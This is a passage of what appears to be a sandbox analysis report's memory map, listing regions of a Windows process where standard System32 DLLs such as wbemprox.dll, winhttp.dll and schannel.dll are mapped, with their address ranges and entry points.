"\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 633 start_va = 0x7ffc04320000 end_va = 0x7ffc04513fff monitored = 0 entry_point = 0x7ffc043a4bf0 region_type = mapped_file name = "windows.cloudstore.dll" filename = "\\Windows\\System32\\Windows.CloudStore.dll" (normalized: "c:\\windows\\system32\\windows.cloudstore.dll") Region: id = 634 start_va = 0x7ffc04520000 end_va = 0x7ffc0459cfff monitored = 0 entry_point = 0x7ffc04523a80 region_type = mapped_file name = "onecorecommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecorecommonproxystub.dll") Region: id = 635 start_va = 0x7ffc04d80000 end_va = 0x7ffc04d97fff monitored = 0 entry_point = 0x7ffc04d85be0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 636 start_va = 0x7ffc04e60000 end_va = 0x7ffc04f6afff monitored = 0 entry_point = 0x7ffc04e95c10 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 637 start_va = 0x7ffc05640000 end_va = 0x7ffc056a9fff monitored = 0 entry_point = 0x7ffc0565bb20 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 638 start_va = 0x7ffc05990000 end_va = 0x7ffc05997fff monitored = 0 entry_point = 0x7ffc05991430 region_type = mapped_file name = "appinfoext.dll" filename = "\\Windows\\System32\\appinfoext.dll" (normalized: "c:\\windows\\system32\\appinfoext.dll") Region: id = 639 start_va = 0x7ffc05dc0000 end_va = 0x7ffc05de7fff monitored = 0 entry_point = 0x7ffc05dc9440 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 640 start_va = 0x7ffc06360000 end_va = 0x7ffc06442fff monitored = 0 entry_point = 0x7ffc063749e0 region_type = mapped_file name = "windows.applicationmodel.dll" filename = "\\Windows\\System32\\Windows.ApplicationModel.dll" (normalized: "c:\\windows\\system32\\windows.applicationmodel.dll") Region: id = 641 start_va = 0x7ffc06640000 end_va = 0x7ffc06656fff monitored = 0 entry_point = 0x7ffc066481c0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 642 start_va = 0x7ffc06660000 end_va = 0x7ffc0667ffff monitored = 0 entry_point = 0x7ffc06668480 region_type = mapped_file name = "windows.staterepositorybroker.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryBroker.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorybroker.dll") Region: id = 643 start_va = 0x7ffc066d0000 end_va = 0x7ffc066e7fff monitored = 0 entry_point = 0x7ffc066d1bf0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 644 start_va = 0x7ffc06750000 end_va = 0x7ffc067a8fff monitored = 0 entry_point = 0x7ffc0675daa0 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 645 start_va = 0x7ffc069e0000 end_va = 0x7ffc069f3fff monitored = 0 entry_point = 0x7ffc069e1b40 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 646 start_va = 0x7ffc06a00000 end_va = 0x7ffc06a08fff monitored = 0 entry_point = 0x7ffc06a01e20 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 647 start_va = 0x7ffc06a10000 end_va = 0x7ffc06a3cfff monitored = 0 entry_point = 0x7ffc06a12480 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 648 start_va = 0x7ffc06a40000 end_va = 0x7ffc06a93fff monitored = 0 entry_point = 0x7ffc06a43780 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 649 start_va = 0x7ffc06aa0000 end_va = 0x7ffc06b91fff monitored = 0 entry_point = 0x7ffc06aca750 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 650 start_va = 0x7ffc06ba0000 end_va = 0x7ffc06bb0fff monitored = 0 entry_point = 0x7ffc06ba3900 region_type = mapped_file name = "windows.staterepositorycore.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryCore.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorycore.dll") Region: id = 651 start_va = 0x7ffc06bc0000 end_va = 0x7ffc06c03fff monitored = 0 entry_point = 0x7ffc06bd0fd0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 652 start_va = 0x7ffc07560000 end_va = 0x7ffc07573fff monitored = 0 entry_point = 0x7ffc07561800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 653 start_va = 0x7ffc07a90000 end_va = 0x7ffc07a9ffff monitored = 0 entry_point = 0x7ffc07a915e0 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 654 start_va = 0x7ffc07ac0000 end_va = 0x7ffc07ac9fff monitored = 0 entry_point = 0x7ffc07ac14a0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 655 start_va = 0x7ffc07ad0000 end_va = 0x7ffc07b4efff monitored = 0 entry_point = 0x7ffc07ad5910 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 656 start_va = 0x7ffc07bb0000 end_va = 0x7ffc07cb1fff monitored = 0 entry_point = 0x7ffc07bf57d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 657 start_va = 0x7ffc07e10000 end_va = 0x7ffc07e27fff monitored = 0 entry_point = 0x7ffc07e15e40 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 658 start_va = 0x7ffc07e30000 end_va = 0x7ffc07e46fff monitored = 0 entry_point = 0x7ffc07e349b0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 659 start_va = 0x7ffc07f50000 end_va = 0x7ffc07fbbfff monitored = 0 entry_point = 0x7ffc07f6ec00 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 660 start_va = 0x7ffc08200000 end_va = 0x7ffc08215fff monitored = 0 entry_point = 0x7ffc08203dc0 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 661 start_va = 0x7ffc08320000 end_va = 0x7ffc0833cfff monitored = 0 entry_point = 0x7ffc083229b0 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 662 start_va = 0x7ffc08340000 end_va = 0x7ffc08356fff monitored = 0 entry_point = 0x7ffc083424b0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 663 start_va = 0x7ffc08360000 end_va = 0x7ffc0836afff monitored = 0 entry_point = 0x7ffc08361f70 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 664 start_va = 0x7ffc08510000 end_va = 0x7ffc0853dfff monitored = 0 entry_point = 0x7ffc085115f0 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 665 start_va = 0x7ffc08540000 end_va = 0x7ffc0856efff monitored = 0 entry_point = 0x7ffc085481d0 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 666 start_va = 0x7ffc085a0000 end_va = 0x7ffc08632fff monitored = 0 entry_point = 0x7ffc085a9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 667 start_va = 0x7ffc087c0000 end_va = 0x7ffc087cdfff monitored = 0 entry_point = 0x7ffc087c2910 region_type = mapped_file name = "timebrokerclient.dll" filename = "\\Windows\\System32\\TimeBrokerClient.dll" (normalized: "c:\\windows\\system32\\timebrokerclient.dll") Region: id = 668 start_va = 0x7ffc08ff0000 end_va = 0x7ffc09054fff monitored = 0 entry_point = 0x7ffc09003640 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 669 start_va = 0x7ffc09690000 end_va = 0x7ffc0987cfff monitored = 0 entry_point = 0x7ffc0970ea20 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 670 start_va = 0x7ffc09880000 end_va = 0x7ffc098d3fff monitored = 0 entry_point = 0x7ffc0988dee0 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 671 start_va = 0x7ffc098e0000 end_va = 0x7ffc099d7fff monitored = 0 entry_point = 0x7ffc098f73e0 region_type = mapped_file name = "appxdeploymentclient.dll" filename = "\\Windows\\System32\\AppXDeploymentClient.dll" (normalized: "c:\\windows\\system32\\appxdeploymentclient.dll") Region: id = 672 start_va = 0x7ffc099e0000 end_va = 0x7ffc099f8fff monitored = 0 entry_point = 0x7ffc099e51e0 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 673 start_va = 0x7ffc09a00000 end_va = 0x7ffc09a28fff monitored = 0 entry_point = 0x7ffc09a09320 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 674 start_va = 0x7ffc0a2b0000 end_va = 0x7ffc0a55dfff monitored = 0 entry_point = 0x7ffc0a2e69a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 675 start_va = 0x7ffc0b620000 end_va = 0x7ffc0b64cfff monitored = 0 entry_point = 0x7ffc0b627cd0 region_type = mapped_file name = "bcp47mrm.dll" filename = "\\Windows\\System32\\BCP47mrm.dll" (normalized: "c:\\windows\\system32\\bcp47mrm.dll") Region: id = 676 start_va = 0x7ffc0b680000 end_va = 0x7ffc0b7d0fff monitored = 0 entry_point = 0x7ffc0b698050 region_type = mapped_file name = "inputhost.dll" filename = "\\Windows\\System32\\InputHost.dll" (normalized: "c:\\windows\\system32\\inputhost.dll") Region: id = 677 start_va = 0x7ffc0b7e0000 end_va = 0x7ffc0b8dbfff monitored = 0 entry_point = 0x7ffc0b81ae50 region_type = mapped_file name = "textinputframework.dll" filename = "\\Windows\\System32\\TextInputFramework.dll" (normalized: "c:\\windows\\system32\\textinputframework.dll") Region: id = 678 start_va = 0x7ffc0b8e0000 end_va = 0x7ffc0ba2bfff monitored = 0 entry_point = 0x7ffc0b911ac0 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 679 start_va = 0x7ffc0ba30000 end_va = 0x7ffc0bb23fff monitored = 0 entry_point = 0x7ffc0ba71eb0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 680 start_va = 0x7ffc0bed0000 end_va = 0x7ffc0bee0fff monitored = 0 entry_point = 0x7ffc0bed6910 region_type = mapped_file name = "dusmapi.dll" filename = "\\Windows\\System32\\dusmapi.dll" (normalized: "c:\\windows\\system32\\dusmapi.dll") Region: id = 681 start_va = 0x7ffc0bef0000 end_va = 0x7ffc0bf04fff monitored = 0 entry_point = 0x7ffc0bef2930 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 682 start_va = 0x7ffc0c030000 end_va = 0x7ffc0c19dfff monitored = 0 entry_point = 0x7ffc0c040f70 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 683 start_va = 0x7ffc0c1a0000 end_va = 0x7ffc0c1dcfff monitored = 0 entry_point = 0x7ffc0c1ab030 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 684 start_va = 0x7ffc0c280000 end_va = 0x7ffc0c2abfff monitored = 0 entry_point = 0x7ffc0c283c80 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 685 start_va = 0x7ffc0c2b0000 end_va = 0x7ffc0c2d8fff monitored = 0 entry_point = 0x7ffc0c2b2b30 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 686 start_va = 0x7ffc0c2e0000 end_va = 0x7ffc0c358fff monitored = 0 entry_point = 0x7ffc0c2f7770 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 687 start_va = 0x7ffc0c370000 end_va = 0x7ffc0c378fff monitored = 0 entry_point = 0x7ffc0c3722e0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 688 start_va = 0x7ffc0c420000 end_va = 0x7ffc0c435fff monitored = 0 entry_point = 0x7ffc0c424250 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 689 start_va = 0x7ffc0c440000 end_va = 0x7ffc0c449fff monitored = 0 entry_point = 0x7ffc0c442680 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 690 start_va = 0x7ffc0c4d0000 end_va = 0x7ffc0c53afff monitored = 0 entry_point = 0x7ffc0c4d25a0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 691 start_va = 0x7ffc0c540000 end_va = 0x7ffc0c550fff monitored = 0 entry_point = 0x7ffc0c543670 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 692 start_va = 0x7ffc0c560000 end_va = 0x7ffc0c5a9fff monitored = 0 entry_point = 0x7ffc0c5749f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 693 start_va = 0x7ffc0c5b0000 end_va = 0x7ffc0c67bfff monitored = 0 entry_point = 0x7ffc0c5ddb30 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 694 start_va = 0x7ffc0c680000 end_va = 0x7ffc0ce10fff monitored = 0 entry_point = 0x7ffc0c695f30 region_type = mapped_file name = "onecoreuapcommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecoreuapcommonproxystub.dll") Region: id = 695 start_va = 0x7ffc0cfb0000 end_va = 0x7ffc0d163fff monitored = 0 entry_point = 0x7ffc0d0268b0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 696 start_va = 0x7ffc0d270000 end_va = 0x7ffc0d471fff monitored = 0 entry_point = 0x7ffc0d2dd800 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 697 start_va = 0x7ffc0d480000 end_va = 0x7ffc0d520fff monitored = 0 entry_point = 0x7ffc0d4901b0 region_type = mapped_file name = "windowmanagementapi.dll" filename = "\\Windows\\System32\\WindowManagementAPI.dll" (normalized: "c:\\windows\\system32\\windowmanagementapi.dll") Region: id = 698 start_va = 0x7ffc0d7e0000 end_va = 0x7ffc0d88bfff monitored = 0 entry_point = 0x7ffc0d7fe600 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 699 start_va = 0x7ffc0d8a0000 end_va = 0x7ffc0d8a9fff monitored = 0 entry_point = 0x7ffc0d8a1780 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 700 start_va = 0x7ffc0d8b0000 end_va = 0x7ffc0d8ccfff monitored = 0 entry_point = 0x7ffc0d8b6d40 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 701 start_va = 0x7ffc0d8d0000 end_va = 0x7ffc0da0ffff monitored = 0 entry_point = 0x7ffc0d8edf50 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 702 start_va = 0x7ffc0da10000 end_va = 0x7ffc0da17fff monitored = 0 entry_point = 0x7ffc0da114a0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 703 start_va = 0x7ffc0db30000 end_va = 0x7ffc0db65fff monitored = 0 entry_point = 0x7ffc0db3f5a0 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 704 start_va = 0x7ffc0e800000 end_va = 0x7ffc0e955fff monitored = 0 entry_point = 0x7ffc0e82b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 705 start_va = 0x7ffc0e960000 end_va = 0x7ffc0ea54fff monitored = 0 entry_point = 0x7ffc0e9a2860 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 706 start_va = 0x7ffc0ea60000 end_va = 0x7ffc0ea73fff monitored = 0 entry_point = 0x7ffc0ea628c0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 707 start_va = 0x7ffc0ea80000 end_va = 0x7ffc0eaa3fff monitored = 0 entry_point = 0x7ffc0ea83de0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 708 start_va = 0x7ffc0eab0000 end_va = 0x7ffc0ead5fff monitored = 0 entry_point = 0x7ffc0eab72c0 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 709 start_va = 0x7ffc0ec10000 end_va = 0x7ffc0ec19fff monitored = 0 entry_point = 0x7ffc0ec11390 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 710 start_va = 0x7ffc0f260000 end_va = 0x7ffc0f5b9fff monitored = 0 entry_point = 0x7ffc0f2e2d50 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 711 start_va = 0x7ffc0f5c0000 end_va = 0x7ffc0f6b1fff monitored = 0 entry_point = 0x7ffc0f6170f0 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 712 start_va = 0x7ffc0f7f0000 end_va = 0x7ffc0f87ffff monitored = 0 entry_point = 0x7ffc0f800880 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 713 start_va = 0x7ffc0f980000 end_va = 0x7ffc0f98bfff monitored = 0 entry_point = 0x7ffc0f982ba0 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 714 start_va = 0x7ffc0fc80000 end_va = 0x7ffc0fca9fff monitored = 0 entry_point = 0x7ffc0fc89e30 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 715 start_va = 0x7ffc0fd80000 end_va = 0x7ffc0fd92fff monitored = 0 entry_point = 0x7ffc0fd83f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 716 start_va = 0x7ffc0ff80000 end_va = 0x7ffc10709fff monitored = 0 entry_point = 0x7ffc1013c050 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 717 start_va = 0x7ffc10710000 end_va = 0x7ffc1071cfff monitored = 0 entry_point = 0x7ffc107126a0 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 718 start_va = 0x7ffc10720000 end_va = 0x7ffc10742fff monitored = 0 entry_point = 0x7ffc10723700 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 719 start_va = 0x7ffc10ab0000 end_va = 0x7ffc10afbfff monitored = 0 entry_point = 0x7ffc10ab9820 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 720 start_va = 0x7ffc10b90000 end_va = 0x7ffc10bbefff monitored = 0 entry_point = 0x7ffc10b972e0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 721 start_va = 0x7ffc10bc0000 end_va = 0x7ffc10c52fff monitored = 0 entry_point = 0x7ffc10bc8f80 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 722 start_va = 0x7ffc10c60000 end_va = 0x7ffc10c92fff monitored = 0 entry_point = 0x7ffc10c66930 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 723 start_va = 0x7ffc10db0000 end_va = 0x7ffc10e40fff monitored = 0 entry_point = 0x7ffc10dd5d30 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 724 start_va = 0x7ffc10e90000 end_va = 0x7ffc10ec3fff monitored = 0 entry_point = 0x7ffc10e96e70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 725 start_va = 0x7ffc10ed0000 end_va = 0x7ffc10ed9fff monitored = 0 entry_point = 0x7ffc10ed1850 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 726 start_va = 0x7ffc10f30000 end_va = 0x7ffc10fb9fff monitored = 0 entry_point = 0x7ffc10f75870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 727 start_va = 0x7ffc10fc0000 end_va = 0x7ffc10fd6fff monitored = 0 entry_point = 0x7ffc10fc1d60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 728 start_va = 0x7ffc111f0000 end_va = 0x7ffc1122afff monitored = 0 entry_point = 0x7ffc111fa620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 729 start_va = 0x7ffc11230000 end_va = 0x7ffc11271fff monitored = 0 entry_point = 0x7ffc1123a3e0 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 730 start_va = 0x7ffc11280000 end_va = 0x7ffc1128bfff monitored = 0 entry_point = 0x7ffc11281ce0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 731 start_va = 0x7ffc11290000 end_va = 0x7ffc11359fff monitored = 0 entry_point = 0x7ffc112bbc80 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 732 start_va = 0x7ffc11500000 end_va = 0x7ffc11569fff monitored = 0 entry_point = 0x7ffc11510e90 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 733 start_va = 0x7ffc116d0000 end_va = 0x7ffc116e7fff monitored = 0 entry_point = 0x7ffc116d4aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 734 start_va = 0x7ffc116f0000 end_va = 0x7ffc116fbfff monitored = 0 entry_point = 0x7ffc116f2200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 735 start_va = 0x7ffc11730000 end_va = 0x7ffc11789fff monitored = 0 entry_point = 0x7ffc1173b770 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 736 start_va = 0x7ffc11790000 end_va = 0x7ffc117bafff monitored = 0 entry_point = 0x7ffc117aa3a0 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 737 start_va = 0x7ffc117e0000 end_va = 0x7ffc1180afff monitored = 0 entry_point = 0x7ffc117e2db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 738 start_va = 0x7ffc11810000 end_va = 0x7ffc1184afff monitored = 0 entry_point = 0x7ffc11814000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 739 start_va = 0x7ffc11850000 end_va = 0x7ffc11876fff monitored = 0 entry_point = 0x7ffc11856200 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 740 start_va = 0x7ffc11960000 end_va = 0x7ffc11971fff 